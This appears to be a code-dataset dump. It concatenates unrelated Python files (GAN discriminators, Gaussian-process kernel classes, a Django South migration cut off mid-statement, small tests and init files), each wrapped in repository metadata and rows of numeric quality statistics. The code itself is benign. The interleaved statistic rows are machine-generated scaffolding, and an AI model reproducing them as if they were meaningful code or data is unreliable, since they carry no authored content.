assert Duration.from_str('100ms') == Duration(100, Resolution.ms, type=int)
assert Duration.from_str('100s') == Duration(100, Resolution.second, type=int)
assert Duration.from_str('100m') == Duration(100, Resolution.minute, type=int)
assert Duration.from_str('100h') == Duration(100, Resolution.hour, type=int)
assert Duration.from_str('100d') == Duration(100, Resolution.day, type=int)
| 48.15625 | 83 | 0.690461 | 216 | 1,541 | 4.865741 | 0.199074 | 0.198858 | 0.319696 | 0.19981 | 0.812559 | 0.76118 | 0.267364 | 0.20647 | 0.126546 | 0.126546 | 0 | 0.097965 | 0.138871 | 1,541 | 31 | 84 | 49.709677 | 0.694047 | 0.025957 | 0 | 0 | 0 | 0 | 0.062708 | 0 | 0 | 0 | 0 | 0 | 0.826087 | 1 | 0.086957 | true | 0 | 0.086957 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5867c94aff3fd94f4d66684a1997b30b01382612 | 69 | py | Python | geoprofile/__init__.py | OpertusMundi/profile | 3c9465ac8ab7f914c9186baf106a9e9f3107e830 | [
"Apache-2.0"
] | null | null | null | geoprofile/__init__.py | OpertusMundi/profile | 3c9465ac8ab7f914c9186baf106a9e9f3107e830 | [
"Apache-2.0"
] | 4 | 2020-12-16T15:37:48.000Z | 2021-07-30T11:45:46.000Z | geoprofile/__init__.py | OpertusMundi/profile | 3c9465ac8ab7f914c9186baf106a9e9f3107e830 | [
"Apache-2.0"
] | null | null | null |
def create_app():
from geoprofile import app
return app.app
| 13.8 | 30 | 0.695652 | 10 | 69 | 4.7 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246377 | 69 | 4 | 31 | 17.25 | 0.903846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
586ca432dd49492c13f97c01696ff01b90e04ebb | 8,675 | py | Python | src/networks/GAN.py | sulaimanvesal/PointCloudUDA | a01aa94247d32d9477afb8a89a4dceda03c3650d | [
"MIT"
] | 16 | 2020-08-24T11:26:14.000Z | 2022-03-23T03:34:04.000Z | src/networks/GAN.py | sulaimanvesal/PointCloudUDA | a01aa94247d32d9477afb8a89a4dceda03c3650d | [
"MIT"
] | 1 | 2022-03-29T14:13:44.000Z | 2022-03-29T14:13:44.000Z | src/networks/GAN.py | sulaimanvesal/PointCloudUDA | a01aa94247d32d9477afb8a89a4dceda03c3650d | [
"MIT"
] | 2 | 2021-11-22T02:31:43.000Z | 2022-02-08T04:59:58.000Z | import torch.nn as nn
import torch.nn.functional as F
import torch
import numpy as np
class Discriminator(nn.Module):
def __init__(self, ):
super(Discriminator, self).__init__()
filter_num_list = [4096, 2048, 1024, 1]
self.fc1 = nn.Linear(24576, filter_num_list[0])
self.leakyrelu = nn.LeakyReLU(negative_slope=0.2)
self.fc2 = nn.Linear(filter_num_list[0], filter_num_list[1])
self.fc3 = nn.Linear(filter_num_list[1], filter_num_list[2])
self.fc4 = nn.Linear(filter_num_list[2], filter_num_list[3])
# self.sigmoid = nn.Sigmoid()
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(0.0, 0.02)
if m.bias is not None:
m.bias.data.zero_()
if isinstance(m, nn.ConvTranspose2d):
m.weight.data.normal_(0.0, 0.02)
if m.bias is not None:
m.bias.data.zero_()
if isinstance(m, nn.Linear):
m.weight.data.normal_(0.0, 0.02)
if m.bias is not None:
# m.bias.data.copy_(1.0)
m.bias.data.zero_()
def forward(self, x):
x = self.leakyrelu(self.fc1(x))
x = self.leakyrelu(self.fc2(x))
x = self.leakyrelu(self.fc3(x))
x = self.fc4(x)
return x
class OutputDiscriminator(nn.Module):
def __init__(self, in_channel=2, softmax=False, init=False):
super(OutputDiscriminator, self).__init__()
self._softmax = softmax
filter_num_list = [64, 128, 256, 512, 1]
self.upsample = nn.UpsamplingBilinear2d(size=(224, 224))
self.conv1 = nn.Conv2d(in_channel, filter_num_list[0], kernel_size=4, stride=2, padding=2, bias=False)
self.conv2 = nn.Conv2d(filter_num_list[0], filter_num_list[1], kernel_size=4, stride=2, padding=2, bias=False)
self.conv3 = nn.Conv2d(filter_num_list[1], filter_num_list[2], kernel_size=4, stride=2, padding=2, bias=False)
self.conv4 = nn.Conv2d(filter_num_list[2], filter_num_list[3], kernel_size=4, stride=2, padding=2, bias=False)
self.conv5 = nn.Conv2d(filter_num_list[3], filter_num_list[4], kernel_size=4, stride=2, padding=2, bias=False)
self.leakyrelu = nn.LeakyReLU(negative_slope=0.2)
# self.sigmoid = nn.Sigmoid()
if init:
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(0.0, 0.02)
if m.bias is not None:
m.bias.data.zero_()
def forward(self, x):
x = self.upsample(x)
if self._softmax:
x = F.softmax(x, dim=1)
x = self.leakyrelu(self.conv1(x))
x = self.leakyrelu(self.conv2(x))
x = self.leakyrelu(self.conv3(x))
x = self.leakyrelu(self.conv4(x))
x = self.conv5(x)
return x
class UncertaintyDiscriminator(nn.Module):
def __init__(self, in_channel=2, heinit=False, ext=False):
# assert not(softmax and sigmoid), "Only one of 'softmax' or 'sigmoid' can be used for activation function."
super(UncertaintyDiscriminator, self).__init__()
# self._softmax = softmax
# self._sigmoid = sigmoid
filter_num_list = [64, 128, 256, 512, 1]
self.conv1 = nn.Conv2d(in_channel, filter_num_list[0], kernel_size=4, stride=2, padding=2, bias=False)
self.conv2 = nn.Conv2d(filter_num_list[0], filter_num_list[1], kernel_size=4, stride=2, padding=2, bias=False)
self.conv3 = nn.Conv2d(filter_num_list[1], filter_num_list[2], kernel_size=4, stride=2, padding=2, bias=False)
self.conv4 = nn.Conv2d(filter_num_list[2], filter_num_list[3], kernel_size=4, stride=2, padding=2, bias=False)
if ext:
self.conv4_2 = nn.Conv2d(filter_num_list[3], 1024, kernel_size=3, stride=2, padding=1, bias=False)
self.conv4_3 = nn.Conv2d(1024, filter_num_list[2], kernel_size=3, stride=2, padding=1, bias=False)
self.conv5 = nn.Conv2d(filter_num_list[2], filter_num_list[4], kernel_size=4, stride=2, padding=2,
bias=False)
else:
self.conv5 = nn.Conv2d(filter_num_list[3], filter_num_list[4], kernel_size=4, stride=2, padding=2, bias=False)
self.leakyrelu = nn.LeakyReLU(negative_slope=0.2)
self._ext = ext
# self.sigmoid = nn.Sigmoid()
self._initialize_weights(heinit=heinit)
def _initialize_weights(self, heinit=False):
if heinit:
for m in self.modules():
if isinstance(m, nn.Conv2d):
prod = float(np.prod(m.weight.size()[1:]))
prod = np.sqrt(2 / prod)
m.weight.data.normal_(0.0, prod)
if m.bias is not None:
m.bias.data.zero_()
else:
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(0.0, 0.02)
if m.bias is not None:
m.bias.data.zero_()
def forward(self, x):
# if self._softmax:
# x = F.softmax(x, dim=1)
# elif self._sigmoid:
# x = F.sigmoid(x)
x = self.leakyrelu(self.conv1(x))
x = self.leakyrelu(self.conv2(x))
x = self.leakyrelu(self.conv3(x))
x = self.leakyrelu(self.conv4(x))
if self._ext:
x = self.leakyrelu(self.conv4_2(x))
x = self.leakyrelu(self.conv4_3(x))
x = self.conv5(x)
return x
class BoundaryDiscriminator(nn.Module):
def __init__(self, ):
super(BoundaryDiscriminator, self).__init__()
filter_num_list = [64, 128, 256, 512, 1]
self.conv1 = nn.Conv2d(1, filter_num_list[0], kernel_size=4, stride=2, padding=2, bias=False)
self.conv2 = nn.Conv2d(filter_num_list[0], filter_num_list[1], kernel_size=4, stride=2, padding=2, bias=False)
self.conv3 = nn.Conv2d(filter_num_list[1], filter_num_list[2], kernel_size=4, stride=2, padding=2, bias=False)
self.conv4 = nn.Conv2d(filter_num_list[2], filter_num_list[3], kernel_size=4, stride=2, padding=2, bias=False)
self.conv5 = nn.Conv2d(filter_num_list[3], filter_num_list[4], kernel_size=4, stride=2, padding=2, bias=False)
self.leakyrelu = nn.LeakyReLU(negative_slope=0.2)
# self.sigmoid = nn.Sigmoid()
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(0.0, 0.02)
if m.bias is not None:
m.bias.data.zero_()
def forward(self, x):
x = self.leakyrelu(self.conv1(x))
x = self.leakyrelu(self.conv2(x))
x = self.leakyrelu(self.conv3(x))
x = self.leakyrelu(self.conv4(x))
x = self.conv5(x)
return x
class BoundaryEntDiscriminator(nn.Module):
def __init__(self, ):
super(BoundaryEntDiscriminator, self).__init__()
filter_num_list = [64, 128, 256, 512, 1]
self.conv1 = nn.Conv2d(3, filter_num_list[0], kernel_size=4, stride=2, padding=2, bias=False)
self.conv2 = nn.Conv2d(filter_num_list[0], filter_num_list[1], kernel_size=4, stride=2, padding=2, bias=False)
self.conv3 = nn.Conv2d(filter_num_list[1], filter_num_list[2], kernel_size=4, stride=2, padding=2, bias=False)
self.conv4 = nn.Conv2d(filter_num_list[2], filter_num_list[3], kernel_size=4, stride=2, padding=2, bias=False)
self.conv5 = nn.Conv2d(filter_num_list[3], filter_num_list[4], kernel_size=4, stride=2, padding=2, bias=False)
self.leakyrelu = nn.LeakyReLU(negative_slope=0.2)
# self.sigmoid = nn.Sigmoid()
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(0.0, 0.02)
if m.bias is not None:
m.bias.data.zero_()
def forward(self, x):
x = self.leakyrelu(self.conv1(x))
x = self.leakyrelu(self.conv2(x))
x = self.leakyrelu(self.conv3(x))
x = self.leakyrelu(self.conv4(x))
x = self.conv5(x)
return x
if __name__ == '__main__':
model_dis = UncertaintyDiscriminator(in_channel=2).cuda()
img = torch.rand((1, 2, 256, 256)).cuda()
output = model_dis(img)
print(output.size())
| 40.162037 | 122 | 0.600346 | 1,249 | 8,675 | 3.980785 | 0.08807 | 0.094127 | 0.135961 | 0.076026 | 0.818584 | 0.786806 | 0.756436 | 0.74819 | 0.714803 | 0.694891 | 0 | 0.055057 | 0.267205 | 8,675 | 215 | 123 | 40.348837 | 0.727073 | 0.046571 | 0 | 0.65625 | 0 | 0 | 0.000969 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.025 | 0 | 0.18125 | 0.00625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5443741ded98b1ef54fd83635bcbce337a3804aa | 96 | py | Python | venv/lib/python3.8/site-packages/poetry/console/commands/env/info.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/poetry/console/commands/env/info.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/poetry/console/commands/env/info.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/08/80/e1/f088ce7587eac445c1e84a6b942175d0ee8925fffbeaae5946b76c08d4 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.40625 | 0 | 96 | 1 | 96 | 96 | 0.489583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5466a3a71c89cf46542d46d89959e1c75f2cb7e6 | 311 | py | Python | tests/expectations/cat-x-cat-date-wgtd-smoothed-col-idx-w4.py | Crunch-io/crunch-cube | 80986d5b2106c774f05176fb6c6a5ea0d840f09d | [
"MIT"
] | 3 | 2021-01-22T20:42:31.000Z | 2021-06-02T17:53:19.000Z | tests/expectations/cat-x-cat-date-wgtd-smoothed-col-idx-w4.py | Crunch-io/crunch-cube | 80986d5b2106c774f05176fb6c6a5ea0d840f09d | [
"MIT"
] | 331 | 2017-11-13T22:41:56.000Z | 2021-12-02T21:59:43.000Z | tests/expectations/cat-x-cat-date-wgtd-smoothed-col-idx-w4.py | Crunch-io/crunch-cube | 80986d5b2106c774f05176fb6c6a5ea0d840f09d | [
"MIT"
] | 1 | 2021-02-19T02:49:00.000Z | 2021-02-19T02:49:00.000Z | [
[float("NaN"), float("NaN"), float("NaN"), 106.88982607],
[float("NaN"), float("NaN"), float("NaN"), 102.61151566],
[float("NaN"), float("NaN"), float("NaN"), 93.80114491],
[float("NaN"), float("NaN"), float("NaN"), 77.23427566],
[float("NaN"), float("NaN"), float("NaN"), 83.54763001],
]
| 38.875 | 61 | 0.553055 | 40 | 311 | 4.3 | 0.3 | 0.697674 | 0.755814 | 0.930233 | 0.697674 | 0.697674 | 0 | 0 | 0 | 0 | 0 | 0.193309 | 0.135048 | 311 | 7 | 62 | 44.428571 | 0.446097 | 0 | 0 | 0 | 0 | 0 | 0.144695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
546c41beb33a1e992554ae351c9e9c866544857b | 35 | py | Python | backend/__init__.py | amosproj/amos-ss2020-infinitag | 931a4151f4ac61f6086fb6e3c0659f148134c16d | [
"MIT"
] | 45 | 2019-07-08T13:07:32.000Z | 2021-06-11T22:34:07.000Z | pygtranslate/__init__.py | varunbalupuri/pygtranslate | 6fe6bdd291fe505f9c05d51c9db8cc5aeef75527 | [
"MIT"
] | 29 | 2020-04-28T16:41:49.000Z | 2020-07-20T05:17:07.000Z | calchas_sympy/__init__.py | s-i-newton/calchas | 13472f837605eff26010a28af9981ba8750e9af9 | [
"Apache-2.0"
] | 10 | 2019-07-10T08:30:27.000Z | 2021-11-23T08:45:42.000Z | from .translator import Translator
| 17.5 | 34 | 0.857143 | 4 | 35 | 7.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
547cf37737e661344a62083ed70d7063504e3e24 | 33 | py | Python | examples/fixme/tests/test_app.py | joeyespo/flask-pytest | 8f4eacd229c849ec017ac81e7010a130e4eb5492 | [
"ISC"
] | 32 | 2015-08-23T19:43:01.000Z | 2020-07-15T14:45:40.000Z | examples/fixme/tests/test_app.py | joeyespo/flask-pytest | 8f4eacd229c849ec017ac81e7010a130e4eb5492 | [
"ISC"
] | 1 | 2015-08-23T19:52:25.000Z | 2015-08-23T19:52:25.000Z | examples/fixme/tests/test_app.py | joeyespo/flask-pytest | 8f4eacd229c849ec017ac81e7010a130e4eb5492 | [
"ISC"
] | null | null | null | def test_app():
assert False
| 11 | 16 | 0.666667 | 5 | 33 | 4.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242424 | 33 | 2 | 17 | 16.5 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5496b0e2da604d3aa376c914ddca37911e6c0fc8 | 132 | py | Python | src/saturnv_ui/saturnv/ui/windows/wizards/__init__.py | epkaz93/saturnv | b8a2c61bb0e833f2e31698050113038bab3ca5a4 | [
"MIT"
] | 1 | 2022-03-12T07:38:09.000Z | 2022-03-12T07:38:09.000Z | src/saturnv_ui/saturnv/ui/windows/wizards/__init__.py | epkaz93/saturnv | b8a2c61bb0e833f2e31698050113038bab3ca5a4 | [
"MIT"
] | null | null | null | src/saturnv_ui/saturnv/ui/windows/wizards/__init__.py | epkaz93/saturnv | b8a2c61bb0e833f2e31698050113038bab3ca5a4 | [
"MIT"
] | null | null | null | from .basewizard import BaseWizardPresenter, BaseWizardPagePresenter, Wizard, WizardPage
from .presetwizard import NewPresetWizard
| 33 | 88 | 0.871212 | 11 | 132 | 10.454545 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 132 | 3 | 89 | 44 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
54a8f96526cfed6908171afe03b5afa3ed12a083 | 7,105 | py | Python | uq_benchmark_2019/gaussian_process_kernels.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-19T04:26:12.000Z | 2022-03-19T04:26:12.000Z | uq_benchmark_2019/gaussian_process_kernels.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | null | null | null | uq_benchmark_2019/gaussian_process_kernels.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-30T07:20:29.000Z | 2022-03-30T07:20:29.000Z | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definitions of kernels for Gaussian Process models for UQ experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
class RBFKernelFn(tf.keras.layers.Layer):
"""ExponentiatedQuadratic kernel provider."""
def __init__(self,
num_classes,
per_class_kernel,
feature_size,
initial_amplitude,
initial_length_scale,
initial_linear_bias,
initial_linear_slope,
add_linear=False,
name='vgp_kernel',
**kwargs):
super(RBFKernelFn, self).__init__(**kwargs)
self._per_class_kernel = per_class_kernel
self._initial_linear_bias = initial_linear_bias
self._initial_linear_slope = initial_linear_slope
self._add_linear = add_linear
with tf.compat.v1.variable_scope(name):
if self._per_class_kernel and num_classes > 1:
amplitude_shape = (num_classes,)
length_scale_shape = (num_classes, feature_size)
else:
amplitude_shape = ()
length_scale_shape = (feature_size,)
self._amplitude = self.add_variable(
initializer=tf.constant_initializer(initial_amplitude),
shape=amplitude_shape,
name='amplitude')
self._length_scale = self.add_variable(
initializer=tf.constant_initializer(initial_length_scale),
shape=length_scale_shape,
name='length_scale')
if self._add_linear:
self._linear_bias = self.add_variable(
initializer=tf.constant_initializer(self._initial_linear_bias),
shape=amplitude_shape,
name='linear_bias')
self._linear_slope = self.add_variable(
initializer=tf.constant_initializer(self._initial_linear_slope),
shape=amplitude_shape,
name='linear_slope')
def call(self, x):
# Never called -- this is just a layer so it can hold variables
# in a way Keras understands.
return x
@property
def kernel(self):
k = tfp.math.psd_kernels.FeatureScaled(
tfp.math.psd_kernels.ExponentiatedQuadratic(
amplitude=tf.nn.softplus(self._amplitude)),
scale_diag=tf.math.sqrt(tf.nn.softplus(self._length_scale)))
if self._add_linear:
k += tfp.math.psd_kernels.Linear(
bias_variance=self._linear_bias,
slope_variance=self._linear_slope)
return k
class MaternKernelFn(tf.keras.layers.Layer):
"""Matern kernel provider."""
def __init__(self,
num_classes,
degree,
per_class_kernel,
feature_size,
initial_amplitude,
initial_length_scale,
initial_linear_bias,
initial_linear_slope,
add_linear=False,
name='vgp_kernel',
**kwargs):
super(MaternKernelFn, self).__init__(**kwargs)
self._per_class_kernel = per_class_kernel
self._initial_linear_bias = initial_linear_bias
self._initial_linear_slope = initial_linear_slope
self._add_linear = add_linear
if degree not in [1, 3, 5]:
raise ValueError(
'Matern degree must be one of [1, 3, 5]: {}'.format(degree))
self._degree = degree
with tf.compat.v1.variable_scope(name):
if self._per_class_kernel and num_classes > 1:
amplitude_shape = (num_classes,)
length_scale_shape = (num_classes, feature_size)
else:
amplitude_shape = ()
length_scale_shape = (feature_size,)
self._amplitude = self.add_variable(
initializer=tf.constant_initializer(initial_amplitude),
shape=amplitude_shape,
name='amplitude')
self._length_scale = self.add_variable(
initializer=tf.constant_initializer(initial_length_scale),
shape=length_scale_shape,
name='length_scale')
if self._add_linear:
self._linear_bias = self.add_variable(
initializer=tf.constant_initializer(self._initial_linear_bias),
shape=amplitude_shape,
name='linear_bias')
self._linear_slope = self.add_variable(
initializer=tf.constant_initializer(self._initial_linear_slope),
shape=amplitude_shape,
name='linear_slope')
def call(self, x):
# Never called -- this is just a layer so it can hold variables
# in a way Keras understands.
return x
@property
def kernel(self):
if self._degree == 1:
kernel_class = tfp.math.psd_kernels.MaternOneHalf
if self._degree == 3:
kernel_class = tfp.math.psd_kernels.MaternThreeHalves
if self._degree == 5:
kernel_class = tfp.math.psd_kernels.MaternFiveHalves
k = tfp.math.psd_kernels.FeatureScaled(
kernel_class(amplitude=tf.nn.softplus(self._amplitude)),
scale_diag=tf.math.sqrt(tf.nn.softplus(self._length_scale)))
if self._add_linear:
k += tfp.math.psd_kernels.Linear(
bias_variance=self._linear_bias,
slope_variance=self._linear_slope)
return k
class LinearKernelFn(tf.keras.layers.Layer):
"""Matern kernel provider."""
def __init__(self,
num_classes,
per_class_kernel,
initial_linear_bias,
initial_linear_slope,
name='vgp_kernel',
**kwargs):
super(LinearKernelFn, self).__init__(**kwargs)
self._per_class_kernel = per_class_kernel
self._initial_linear_bias = initial_linear_bias
self._initial_linear_slope = initial_linear_slope
with tf.compat.v1.variable_scope(name):
if self._per_class_kernel and num_classes > 1:
shape = (num_classes,)
else:
shape = ()
self._linear_bias = self.add_variable(
initializer=tf.constant_initializer(self._initial_linear_bias),
shape=shape,
name='linear_bias')
self._linear_slope = self.add_variable(
initializer=tf.constant_initializer(self._initial_linear_slope),
shape=shape,
name='linear_slope')
def call(self, x):
# Never called -- this is just a layer so it can hold variables
# in a way Keras understands.
return x
@property
def kernel(self):
return tfp.math.psd_kernels.Linear(
bias_variance=self._linear_bias,
slope_variance=self._linear_slope)
| 33.672986 | 76 | 0.665447 | 859 | 7,105 | 5.165309 | 0.189756 | 0.070318 | 0.037863 | 0.058598 | 0.764481 | 0.759071 | 0.718278 | 0.718278 | 0.718278 | 0.718278 | 0 | 0.004701 | 0.251513 | 7,105 | 210 | 77 | 33.833333 | 0.829635 | 0.141872 | 0 | 0.819355 | 0 | 0 | 0.030213 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058065 | false | 0 | 0.032258 | 0.025806 | 0.148387 | 0.006452 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
49c582cdc040dce2dc0aa9ffea3ee5339a702bc5 | 20,909 | py | Python | src/apps/ecidadania/voting/migrations/0001_initial.py | sdaityari/e-cidadania | 2fc7f312145e7cd674033f3d765ff9ff8d4fb23c | [
"Apache-2.0"
] | 40 | 2015-03-26T20:46:16.000Z | 2022-02-28T09:15:30.000Z | src/apps/ecidadania/voting/migrations/0001_initial.py | zixtor/e-cidadania | 2fc7f312145e7cd674033f3d765ff9ff8d4fb23c | [
"Apache-2.0"
] | 1 | 2017-07-29T09:44:12.000Z | 2017-08-08T16:27:22.000Z | src/apps/ecidadania/voting/migrations/0001_initial.py | zixtor/e-cidadania | 2fc7f312145e7cd674033f3d765ff9ff8d4fb23c | [
"Apache-2.0"
] | 19 | 2015-01-13T20:40:49.000Z | 2021-11-02T03:53:39.000Z | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Poll'
db.create_table(u'voting_poll', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('question', self.gf('django.db.models.fields.CharField')(max_length=200)),
('pub_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('poll_lastup', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('author', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='poll-author', null=True, to=orm['auth.User'])),
('space', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['spaces.Space'], null=True, blank=True)),
('poll_tags', self.gf('apps.thirdparty.tagging.fields.TagField')(max_length=255, blank=True)),
('start_date', self.gf('django.db.models.fields.DateField')()),
('end_date', self.gf('django.db.models.fields.DateField')()),
))
db.send_create_signal(u'voting', ['Poll'])
# Adding M2M table for field participants on 'Poll'
m2m_table_name = db.shorten_name(u'voting_poll_participants')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('poll', models.ForeignKey(orm[u'voting.poll'], null=False)),
('user', models.ForeignKey(orm[u'auth.user'], null=False))
))
db.create_unique(m2m_table_name, ['poll_id', 'user_id'])
# Adding model 'Choice'
db.create_table(u'voting_choice', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('poll', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['voting.Poll'])),
('choice_text', self.gf('django.db.models.fields.CharField')(max_length=200, null=True, blank=True)),
))
db.send_create_signal(u'voting', ['Choice'])
# Adding M2M table for field votes on 'Choice'
m2m_table_name = db.shorten_name(u'voting_choice_votes')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('choice', models.ForeignKey(orm[u'voting.choice'], null=False)),
('user', models.ForeignKey(orm[u'auth.user'], null=False))
))
db.create_unique(m2m_table_name, ['choice_id', 'user_id'])
# Adding model 'Voting'
db.create_table(u'voting_voting', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(unique=True, max_length=200)),
('description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('space', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['spaces.Space'], null=True, blank=True)),
('date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('date_mod', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('author', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('start_date', self.gf('django.db.models.fields.DateField')(null=True, blank=True)),
('end_date', self.gf('django.db.models.fields.DateField')(null=True, blank=True)),
('ponderation', self.gf('django.db.models.fields.CharField')(max_length=3, null=True, blank=True)),
('max_votes', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
))
db.send_create_signal(u'voting', ['Voting'])
# Adding M2M table for field proposalsets on 'Voting'
m2m_table_name = db.shorten_name(u'voting_voting_proposalsets')
db.create_table(m2m_table_name, (
